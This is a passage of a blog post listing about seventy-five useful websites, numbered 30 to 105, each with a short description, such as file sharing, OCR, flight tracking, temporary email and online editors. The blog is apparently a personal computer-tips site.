30. tineye.com – This is like an online version of Google Googles.

31. iwantmyname.com– Helps you search domains across allTLDs.

32. tabbloid.com –Your favorite blogs delivered as PDFs.

33. join. me – Share your screen with anyone over the web.

34. onlineocr.net –Recognize text from scanned PDFs and images – see other OCR tools.

35. flightstats.com –Track flight status at airports worldwide.

36. wetransfer.com –For sharing really big files online.

37. pastebin.com – A temporary onlineclipboard for your text and code snippets.

38.polishmywriting.com –Check your writing for spelling or grammatical errors.

39.awesomehighlighter.com– Easily highlight the important parts of a web page.

40. typewith.me –Work on the same document with multiple people.

41.whichdateworks.com –Planning an event? Find a date that works for all.

42. everytimezone.com– A less confusing view of the world time zones.

43. warrick.cs.odu.edu– You’ll need this when your bookmarked web pages are deleted.

44. gtmetrix.com – The perfect tool for measuring your site performance online.

45. imo.im – Chat with your buddies on Skype,Facebook, GoogleTalk, etc from one place.

46.translate.google.com– Translate web pages,PDFs and Office documents.

47. youtube.com/leanback – Sit back and enjoy YouTube videos in full-screen mode.

48. similarsites.com –Discover new sites that are similar to what you like already.

49. wordle.net – Quicksummarize long pieces of text with tag clouds.

50. bubbl.us – Create mind-maps, brainstorm ideas in the browser.

51. kuler.adobe.com –Get color ideas, also extract colors from photographs.

52. followupthen.com– Setup quick reminders via email itself.

53. lmgtfy.com – When your friends are too lazy to use Google on their own.

54. tempalias.com –Generate temporary email aliases, better than disposable email.

55. pdfescape.com –Lets you can quickly edit PDFs in the browser itself.

56. faxzero.com – Send an online fax for free– see more fax services.

57. feedmyinbox.com –Get RSS feeds as an email newsletter.

58. isendr.com –Transfer files without uploading to a server.

59. tinychat.com –Setup a private chatroom in micro-seconds.

60. privnote.com –Create text notes that will self-destruct after being read.

61. flightaware.com –Live flight tracking service for airports worldwide.

62. boxoh.com – Track the status of any shipment on Google Maps – alternative.

63. chipin.com – When you need to raise funds online for an event or a cause.

64.downforeveryoneorjustme.com – Is your favorites really offline?

65. example.com – This website can be used as an example in documentation.

66.whoishostingthis.com –Find the web host of any website.

67. google.com/history– Found something on Google but can’t remember it now?

68.errorlevelanalysis.com– Find whether a photo is real or aphotoshopped one.

69. google.com/dictionary – Get word meanings, pronunciations and usage examples.

70.urbandictionary.com –Find definitions of slangs and informal words.

71. seatguru.com –Consult this site before choosing a seat for your next flight.

72. sxc.hu – Download stock images absolutely free.

73.download.com.np-Get all softwares.

74. wobzip.org – Unzip your compressed files online.

75. vocaroo.com –Record your voice with a click.

76. scribblemaps.com– Create custom Google Maps easily.

77. buzzfeed.com –Never miss another Internet meme or viral video.

78. alertful.com –Quickly setup email reminders for important events.

79.encrypted.google.com– Prevent your ISP and boss from reading your search queries.

80. formspring.me –You can ask or answer personal questions here.

81. snopes.com – Find if that email offer you received is real or just another scam.

82. typingweb.com –Master touch-typing with these practice sessions.

83. mailvu.com – Send video emails to anyone using your webcam.

84. ge.tt – Quickly send a file to someone,they can even preview it before downloading.

85. timerime.com –Create timelines with audio, video and images.

86. stupeflix.com –Make a movie out of your images, audio and video clips.

87. aviary.com/myna –An online audio editor that lets you record and remix audio clip.

88. noteflight.com –Print music sheets, write your own music online (review).

89.disposablewebpage.com– Create a temporary web page that self-destruct.

90. namemytune.com– When you need to find the name of a song.

91. homestyler.com –Design from scratch or re-model your home in3d.

92. snapask.com – Use email on your phone to find sports scores, read Wikipedia, etc.

93. teuxdeux.com – A beautiful to-do app that resembles a paper diary.

94. livestream.com –Broadcast events live over the web, including your desktop screen.

95. bing.com/images –Automatically find perfectly-sized wallpapers for mobiles.

96. historio.us –Preserve complete web pages with all the formatting.

97. dabbleboard.com –Your virtual whiteboard.

98. whisperbot.com –Send an email without using your own account.

99. sumopaint.com –An excellent layer-based online image editor.

100. lovelycharts.com– Create flowcharts, network diagrams, Sitemaps, etc.

101. nutshellmail.com– Get your Facebook and Twitter streams in your Inbox.

102.The Hype Machine -Web-based music discovery site based on the music posted to blogshttp://hypem.com/

103.SimpleWash -A site to help you clean up old content you may not want to show on your social media profiles anymore (currently Facebook only, Twitter is coming soon) SimpleWash™

104.ListenToYouTube.com -Converts YouTube videos to mp3sYouTube to MP3 Converter - Fast, Free - ListenToYouTube.com

105.PushBullet -Easily send notes, links, lists, files, etc. to your Android phonehttps://www.pushbullet.com/
Read more ...
Back to top ↑

    recent comments

    Powered by Blogger.

    Popular Posts

    Blog Archive

Translate

about this blog


this blog is for educational purpose only hacking is a crime but utilizing its knowledge for good purposes is not a crime

you will get here all the tricks and much more knowledge which you need and many more at this blog



by:pavan joshi

Contact Form

Name

Email *

Message *

© 2013 computer tips and tricks with pavan joshi. WP Mythemeshop Converted by Bloggertheme9
Blogger templates. Proudly Powered by pavan joshi and my friends .